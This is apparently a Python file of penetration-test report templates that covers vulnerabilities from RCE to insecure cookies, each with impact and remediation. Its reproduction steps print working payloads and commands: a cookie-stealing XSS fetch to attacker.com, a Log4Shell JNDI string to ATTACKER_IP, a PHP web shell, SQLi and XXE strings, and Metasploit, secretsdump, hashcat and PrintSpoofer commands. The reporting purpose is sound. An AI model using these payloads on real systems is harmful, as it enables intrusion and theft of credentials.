from __future__ import annotations

FINDING_TEMPLATES: list[dict] = [

    # ── CRITICAL ──────────────────────────────────────────────────────────────
    {
        "key": "rce",
        "title": "Remote Code Execution",
        "severity": "critical",
        "description": "The target is vulnerable to remote code execution (RCE), allowing an attacker to execute arbitrary operating system commands on the server.",
        "impact": "Complete compromise of the affected system. An attacker can read sensitive files, exfiltrate data, deploy persistent backdoors, and use the host as a pivot point into internal network segments.",
        "steps_to_reproduce": "1. Navigate to the vulnerable endpoint: `[URL]`\n2. Supply the following payload:\n```\n[PAYLOAD]\n```\n3. Observe arbitrary OS command output returned in the server response.",
        "remediation": "- Validate and sanitize all user-controlled input before passing it to system calls or interpreters.\n- Avoid invoking OS commands from application code; use language-native library equivalents instead.\n- Run application services under dedicated, least-privilege accounts.\n- Apply WAF rules to detect and block common command injection patterns.",
    },
    {
        "key": "cmd-injection",
        "title": "Command Injection",
        "severity": "critical",
        "description": "User-controlled input is passed unsanitized to a system shell, allowing an attacker to inject and execute arbitrary OS commands alongside the intended command.",
        "impact": "Arbitrary command execution as the web server process user. An attacker can read files, write backdoors, exfiltrate data, and establish reverse shells.",
        "steps_to_reproduce": "1. Identify the parameter passed to a shell command.\n2. Inject a command separator followed by a payload, e.g.:\n```\n[PARAM]; id\n[PARAM] | whoami\n```\n3. Observe the injected command output in the HTTP response or via an out-of-band channel.",
        "remediation": "- Never pass user input directly to shell commands.\n- Use parameterised APIs (e.g. `subprocess` with a list in Python) instead of string concatenation.\n- Apply strict input allow-listing to accepted characters.",
    },
    {
        "key": "sqli-auth",
        "title": "SQL Injection — Authentication Bypass",
        "severity": "critical",
        "description": "The login form is vulnerable to SQL injection. An attacker can bypass authentication and gain access as any user, including administrators, without a valid password.",
        "impact": "Unauthenticated access to all functionality available to the targeted account. Administrative accounts yield full control over the application and its data.",
        "steps_to_reproduce": "1. Navigate to the login form at `[URL]`.\n2. Enter the following payload in the username field:\n```\n' OR '1'='1' --\n```\n3. Enter any value in the password field and submit.\n4. Observe that authentication is bypassed and the attacker is logged in as the target account.",
        "remediation": "- Use parameterised queries (prepared statements) for all database interactions.\n- Employ an ORM that constructs queries safely.\n- Validate and sanitize all user-supplied input server-side.\n- Enforce strong authentication and multi-factor authentication where possible.",
    },
    {
        "key": "ms17-010",
        "title": "MS17-010 / EternalBlue — Unauthenticated RCE via SMBv1",
        "severity": "critical",
        "description": "The host is running a version of Windows SMBv1 vulnerable to MS17-010 (CVE-2017-0144), commonly known as EternalBlue. An unauthenticated attacker on the network can exploit this to execute arbitrary code as SYSTEM.",
        "impact": "Unauthenticated remote code execution as `NT AUTHORITY\\SYSTEM`. Full system compromise including credential dumping via LSASS and unrestricted lateral movement.",
        "steps_to_reproduce": "1. Confirm vulnerability:\n```\nnmap -p 445 --script smb-vuln-ms17-010 [TARGET]\n```\n2. Exploit:\n```\nmsfconsole -q -x \"use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS [TARGET]; run\"\n```\n3. Observe SYSTEM shell.",
        "remediation": "- Apply Microsoft security patch MS17-010 immediately.\n- Disable SMBv1 on all hosts via Group Policy or PowerShell: `Set-SmbServerConfiguration -EnableSMB1Protocol $false`.\n- Block inbound SMB (TCP 445) from untrusted network segments at the perimeter firewall.",
    },
    {
        "key": "log4shell",
        "title": "Log4Shell (CVE-2021-44228) — JNDI Remote Code Execution",
        "severity": "critical",
        "description": "The application uses Apache Log4j2 vulnerable to CVE-2021-44228. A malicious JNDI lookup string injected into a logged field causes the server to load and execute a remote Java class.",
        "impact": "Remote code execution as the JVM process user. An attacker can exfiltrate environment variables (including cloud IAM credentials), deploy backdoors, and pivot to internal systems.",
        "steps_to_reproduce": "1. Identify a field that is logged server-side (e.g. `User-Agent`, `X-Forwarded-For`, search query).\n2. Send a request with the payload:\n```\n${jndi:ldap://[ATTACKER_IP]:1389/exploit}\n```\n3. Host a malicious LDAP server (e.g. `marshalsec`) and HTTP server serving the exploit class.\n4. Observe the target making an outbound LDAP connection and loading the payload.",
        "remediation": "- Upgrade Log4j2 to ≥ 2.17.1 (Java 8), ≥ 2.12.4 (Java 7), or ≥ 2.3.2 (Java 6).\n- Short-term: set JVM flag `-Dlog4j2.formatMsgNoLookups=true`.\n- Block outbound LDAP/RMI from application servers at the firewall.",
    },

    # ── HIGH ──────────────────────────────────────────────────────────────────
    {
        "key": "sqli-data",
        "title": "SQL Injection — Data Exfiltration",
        "severity": "high",
        "description": "A user-controlled parameter is embedded unsanitized in a SQL query, enabling an attacker to enumerate the database schema and extract arbitrary data.",
        "impact": "Exposure of the full database including user credentials, personal data, and application secrets. Depending on database user privileges, this may extend to reading OS files or executing system commands.",
        "steps_to_reproduce": "1. Identify the injectable parameter at `[URL]`.\n2. Confirm boolean-based injection:\n```\n[PARAM]' AND 1=1--   (true baseline)\n[PARAM]' AND 1=2--   (different response)\n```\n3. Automate extraction:\n```\nsqlmap -u \"[URL]\" -p [PARAM] --dbs --batch\n```",
        "remediation": "- Use parameterised queries for all database interactions.\n- Apply least-privilege to database accounts — the application account should not have DBA rights.\n- Implement WAF rules to detect SQL injection payloads.",
    },
    {
        "key": "stored-xss",
        "title": "Stored Cross-Site Scripting (XSS)",
        "severity": "high",
        "description": "User-controlled input is stored server-side and reflected into page output without encoding. An attacker can inject persistent JavaScript that executes in every user's browser on page load.",
        "impact": "Session hijacking, credential theft, keylogging, defacement, and malicious redirects. Administrator accounts are high-value targets as compromise may escalate to server-side access.",
        "steps_to_reproduce": "1. Navigate to `[URL]`.\n2. Submit the following payload in the `[FIELD]` field:\n```html\n<script>fetch('https://attacker.com/?c='+document.cookie)</script>\n```\n3. Log in as a different user and load the affected page.\n4. Observe the payload executing and the cookie being exfiltrated.",
        "remediation": "- Encode all user-supplied output using context-appropriate encoding (HTML entity encoding in HTML contexts).\n- Implement a strict `Content-Security-Policy` header to restrict inline scripts.\n- Use a templating engine that auto-escapes output by default.",
    },
    {
        "key": "default-creds",
        "title": "Default Credentials",
        "severity": "high",
        "description": "The service is accessible using default or vendor-supplied credentials that have not been changed since deployment.",
        "impact": "Immediate authenticated access without any brute-force. Depending on the service, this can lead to RCE, sensitive data access, and lateral movement.",
        "steps_to_reproduce": "1. Access the service at `[URL / IP:PORT]`.\n2. Log in with credentials `[USERNAME]` / `[PASSWORD]`.\n3. Observe full authenticated access granted.",
        "remediation": "- Change all default credentials immediately upon deployment.\n- Enforce credential rotation as part of the build and deployment checklist.\n- Use a secrets management solution to generate and store unique, random credentials per service.",
    },
    {
        "key": "privesc-linux",
        "title": "Privilege Escalation — Linux",
        "severity": "high",
        "description": "A low-privileged local user can escalate to root via a misconfiguration. Common vectors include SUID/SGID binaries, overly permissive sudo rules, writable cron scripts, and world-writable sensitive files.",
        "impact": "Full root-level control of the host, including reading `/etc/shadow`, installing backdoors, and pivoting to other internal systems.",
        "steps_to_reproduce": "1. Enumerate SUID binaries:\n```\nfind / -perm -4000 -type f 2>/dev/null\n```\n2. Check sudo rules:\n```\nsudo -l\n```\n3. Review cron jobs:\n```\ncat /etc/crontab; ls -la /etc/cron*\n```\n4. Exploit the identified vector to obtain a root shell.",
        "remediation": "- Remove the SUID bit from binaries that do not require it: `chmod u-s [binary]`\n- Restrict sudo rules to the minimum required commands with `NOPASSWD` used only where justified.\n- Ensure cron scripts are owned by root and not world-writable.\n- Run periodic audits using LinPEAS or similar.",
    },
    {
        "key": "privesc-windows",
        "title": "Privilege Escalation — Windows (SeImpersonatePrivilege)",
        "severity": "high",
        "description": "The compromised service account holds the `SeImpersonatePrivilege` token privilege. This can be abused via a Potato-family exploit (PrintSpoofer, GodPotato) to escalate to `NT AUTHORITY\\SYSTEM`.",
        "impact": "Full SYSTEM-level access, credential dumping from LSASS, and unrestricted lateral movement via Pass-the-Hash or Pass-the-Ticket.",
        "steps_to_reproduce": "1. Confirm the privilege:\n```\nwhoami /priv\n```\n2. Transfer PrintSpoofer or GodPotato to the target.\n3. Execute:\n```\nPrintSpoofer.exe -i -c cmd\n```\n4. Observe SYSTEM shell.",
        "remediation": "- Do not run application pools or services under accounts with `SeImpersonate` or `SeAssignPrimaryToken`.\n- Use dedicated service accounts with the minimum required privileges.\n- Apply CIS Windows Server Benchmarks.",
    },
    {
        "key": "kerberoasting",
        "title": "Kerberoasting",
        "severity": "high",
        "description": "Service accounts with registered SPNs are present in Active Directory. Any authenticated domain user can request Kerberos TGS tickets for these accounts and crack them offline.",
        "impact": "If a service account uses a weak password, the TGS ticket can be cracked to reveal plaintext credentials — potentially a highly-privileged domain or service account.",
        "steps_to_reproduce": "1. Request TGS hashes:\n```\nGetUserSPNs.py [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] -request -outputfile hashes.kerberoast\n```\n2. Crack offline:\n```\nhashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt --force\n```",
        "remediation": "- Ensure all SPN-linked accounts use long, randomly generated passwords (25+ characters).\n- Audit SPN registrations and remove unnecessary ones.\n- Enable AES-only Kerberos encryption for service accounts.\n- Migrate to Group Managed Service Accounts (gMSA) wherever possible.",
    },
    {
        "key": "asrep-roasting",
        "title": "AS-REP Roasting",
        "severity": "high",
        "description": "One or more Active Directory accounts have Kerberos pre-authentication disabled. An unauthenticated attacker can request AS-REP responses and attempt to crack the encrypted portion offline.",
        "impact": "Credential compromise for accounts with pre-auth disabled, without requiring any existing valid credentials.",
        "steps_to_reproduce": "1. Enumerate pre-auth disabled accounts:\n```\nGetNPUsers.py [DOMAIN]/ -usersfile users.txt -no-pass -dc-ip [DC_IP] -outputfile asrep.hashes\n```\n2. Crack:\n```\nhashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt\n```",
        "remediation": "- Enable Kerberos pre-authentication on all accounts.\n- Audit with: `Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth`",
    },
    {
        "key": "pass-the-hash",
        "title": "Pass-the-Hash",
        "severity": "high",
        "description": "NTLM password hashes captured on one host were successfully used to authenticate to other hosts without cracking the underlying password.",
        "impact": "Lateral movement across the entire environment wherever the account has local administrator rights.",
        "steps_to_reproduce": "1. Dump NTLM hashes:\n```\nsecretsdump.py [DOMAIN]/[USER]:[PASS]@[TARGET]\n```\n2. Spray the hash:\n```\nnetexec smb [TARGET_RANGE] -u [USER] -H [NTLM_HASH] --local-auth\n```\n3. Observe successful authentication on multiple hosts.",
        "remediation": "- Enable Windows Defender Credential Guard to block LSASS memory reads.\n- Implement tiered administration — privileged accounts must not log in to lower-trust hosts.\n- Randomise local administrator passwords using LAPS.\n- Disable NTLM where Kerberos is available.",
    },
    {
        "key": "idor",
        "title": "Insecure Direct Object Reference (IDOR)",
        "severity": "high",
        "description": "The application uses predictable, user-controlled identifiers to reference resources without verifying that the requesting user is authorised to access them.",
        "impact": "Horizontal privilege escalation — an authenticated attacker can access, modify, or delete data belonging to any other user.",
        "steps_to_reproduce": "1. Log in as User A and note their resource identifier in the request: `[URL]?id=[ID_A]`\n2. Substitute it with an identifier belonging to User B: `?id=[ID_B]`\n3. Observe User B's data is returned without authorisation error.",
        "remediation": "- Enforce server-side ownership checks on every request to a resource.\n- Use unpredictable identifiers (UUIDs) rather than sequential integers.\n- Implement a centralised authorisation layer (ABAC/RBAC).",
    },

    # ── MEDIUM ────────────────────────────────────────────────────────────────
    {
        "key": "path-traversal",
        "title": "Path Traversal / Directory Traversal",
        "severity": "medium",
        "description": "A user-controlled parameter is used to construct a file path without sanitization. An attacker can supply `../` sequences to escape the intended directory and read arbitrary files.",
        "impact": "Disclosure of sensitive files including `/etc/passwd`, `/etc/shadow`, application configuration files, private keys, and source code.",
        "steps_to_reproduce": "1. Identify the parameter used to select a file: `[URL]?file=[FILENAME]`\n2. Supply a traversal payload:\n```\n../../../../etc/passwd\n```\n3. Observe the contents of `/etc/passwd` returned in the response.",
        "remediation": "- Canonicalize file paths and verify the resolved path starts with the expected base directory.\n- Use allowlists of permitted file identifiers rather than accepting user-supplied paths.\n- Run the application under an account with minimal filesystem read permissions.",
    },
    {
        "key": "reflected-xss",
        "title": "Reflected Cross-Site Scripting (XSS)",
        "severity": "medium",
        "description": "User-supplied input is echoed directly into the HTTP response without encoding, allowing an attacker to inject JavaScript that executes in a victim's browser when they click a crafted link.",
        "impact": "Session hijacking, credential theft via phishing, and malicious redirects. Exploitation requires the victim to follow an attacker-crafted URL.",
        "steps_to_reproduce": "1. Identify the reflective parameter at `[URL]`.\n2. Inject the payload:\n```\n[PARAM]=<script>alert(document.domain)</script>\n```\n3. Observe script execution in the browser.",
        "remediation": "- Encode all user-supplied output using context-appropriate escaping.\n- Implement a `Content-Security-Policy` header.\n- Use a templating engine with automatic output escaping.",
    },
    {
        "key": "ssrf",
        "title": "Server-Side Request Forgery (SSRF)",
        "severity": "medium",
        "description": "A user-controlled URL is fetched server-side without validation, allowing an attacker to cause the server to make requests to internal infrastructure or cloud metadata endpoints.",
        "impact": "Access to internal services not exposed to the internet, AWS/GCP/Azure metadata credential theft, and potential pivot to internal network segments.",
        "steps_to_reproduce": "1. Identify the parameter accepting a URL: `[PARAM]`\n2. Supply an internal or metadata target:\n```\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/\n```\n3. Observe the internal resource returned in the response.",
        "remediation": "- Validate and allowlist all URLs fetched server-side.\n- Block outbound requests to loopback, link-local (169.254.0.0/16), and RFC-1918 ranges.\n- Enforce IMDSv2 on cloud instances and disable the token-optional IMDSv1 fallback.",
    },
    {
        "key": "xxe",
        "title": "XML External Entity Injection (XXE)",
        "severity": "medium",
        "description": "The application parses XML that allows DOCTYPE declarations. An attacker can define an external entity referencing a local file or internal URL to read its contents via the XML parser.",
        "impact": "Local file disclosure (e.g. `/etc/passwd`, application config), internal SSRF, and in some configurations blind XXE via DNS/HTTP out-of-band channels.",
        "steps_to_reproduce": "1. Submit the following XML to the accepting endpoint:\n```xml\n<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n  <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n]>\n<root>&xxe;</root>\n```\n2. Observe the contents of `/etc/passwd` in the response.",
        "remediation": "- Disable external entity processing in the XML parser (`FEATURE_EXTERNAL_GENERAL_ENTITIES = false`).\n- Use JSON APIs where possible.\n- Validate XML input against a strict schema (XSD).",
    },
    {
        "key": "insecure-upload",
        "title": "Unrestricted File Upload",
        "severity": "medium",
        "description": "The file upload functionality accepts arbitrary file types without adequate validation, allowing an attacker to upload server-side executable code.",
        "impact": "Remote code execution if uploaded files are stored within the web root and the server executes them (e.g. PHP, ASPX webshells). At minimum, malicious content can be served to other users.",
        "steps_to_reproduce": "1. Navigate to the upload functionality at `[URL]`.\n2. Upload a file named `shell.php` containing:\n```php\n<?php system($_GET['cmd']); ?>\n```\n3. Access the uploaded file at `[UPLOAD_URL]/shell.php?cmd=id`.\n4. Observe arbitrary command execution.",
        "remediation": "- Validate file type using magic bytes, not extension or MIME type alone.\n- Store uploaded files outside the web root or in isolated blob storage.\n- Serve uploaded files from a separate domain with script execution disabled.\n- Rename uploaded files to strip the original extension.",
    },
    {
        "key": "missing-auth",
        "title": "Missing Authentication on Sensitive Endpoint",
        "severity": "medium",
        "description": "A sensitive endpoint or administrative function is accessible without authentication, allowing any unauthenticated user to access or modify protected resources.",
        "impact": "Exposure of sensitive data or privileged functionality to unauthenticated parties.",
        "steps_to_reproduce": "1. Without an active session, navigate to `[URL]`.\n2. Observe that access is granted and sensitive data or actions are available.",
        "remediation": "- Apply authentication middleware to all sensitive routes.\n- Enforce server-side authorisation checks on every request — never rely on client-side controls.\n- Cover authentication bypass scenarios in the CI/CD test suite.",
    },

    # ── LOW / INFO ─────────────────────────────────────────────────────────────
    {
        "key": "open-redirect",
        "title": "Open Redirect",
        "severity": "low",
        "description": "The application accepts a user-supplied URL as a redirect target without validation, allowing an attacker to craft URLs that appear trustworthy but redirect to attacker-controlled sites.",
        "impact": "Phishing attacks leveraging the trusted domain as a launcher. May be chained to steal OAuth tokens or session cookies.",
        "steps_to_reproduce": "1. Navigate to `[URL]?redirect=https://evil.com`.\n2. Observe the server returning a redirect to `https://evil.com`.",
        "remediation": "- Validate redirect targets against a server-side allowlist of trusted URLs.\n- Use relative paths for post-action redirects.\n- Display an interstitial warning page before redirecting to external domains.",
    },
    {
        "key": "info-disclosure",
        "title": "Information Disclosure",
        "severity": "low",
        "description": "The application exposes sensitive technical information — such as software version banners, internal IP addresses, stack traces, or directory listings — that aids an attacker in fingerprinting the environment.",
        "impact": "Provides an attacker with version information useful for identifying matching CVEs and planning targeted attacks.",
        "steps_to_reproduce": "1. Observe `Server` and `X-Powered-By` response headers.\n2. Trigger an error condition and note the stack trace revealing internal paths and library versions.\n3. Observed disclosure: `[SPECIFIC DETAIL]`",
        "remediation": "- Remove or suppress server version headers in production configuration.\n- Implement generic custom error pages that do not reveal internal paths or stack traces.\n- Disable directory listing on the web server.",
    },
    {
        "key": "missing-headers",
        "title": "Missing HTTP Security Headers",
        "severity": "info",
        "description": "The application does not send recommended security headers, reducing browser-level defence-in-depth against injection and clickjacking attacks.",
        "impact": "Increases the exploitability and impact of other vulnerabilities (e.g. XSS, clickjacking) by removing built-in browser mitigations.",
        "steps_to_reproduce": "The following headers were absent from responses:\n- `Content-Security-Policy`\n- `X-Frame-Options`\n- `X-Content-Type-Options`\n- `Referrer-Policy`\n- `Permissions-Policy`",
        "remediation": "- Set `Content-Security-Policy: default-src 'self'` and refine per-page.\n- Set `X-Frame-Options: DENY` to prevent clickjacking.\n- Set `X-Content-Type-Options: nosniff`.\n- Set `Referrer-Policy: strict-origin-when-cross-origin`.\n- Validate header configuration with [securityheaders.com](https://securityheaders.com).",
    },
    {
        "key": "insecure-cookies",
        "title": "Insecure Cookie Configuration",
        "severity": "info",
        "description": "Session cookies are issued without the `HttpOnly` and/or `Secure` flags, making them accessible to JavaScript and transmissible over unencrypted connections.",
        "impact": "Cookie theft via XSS (missing `HttpOnly`) or network interception on HTTP (missing `Secure`).",
        "steps_to_reproduce": "1. Log in and inspect the `Set-Cookie` response header.\n2. Observe the session cookie lacks `HttpOnly` and/or `Secure` attributes.",
        "remediation": "- Set `HttpOnly` on all session cookies to prevent JavaScript access.\n- Set `Secure` to restrict transmission to HTTPS.\n- Set `SameSite=Lax` (or `Strict`) to mitigate CSRF.\n- Review all cookies in the application for these attributes.",
    },
]
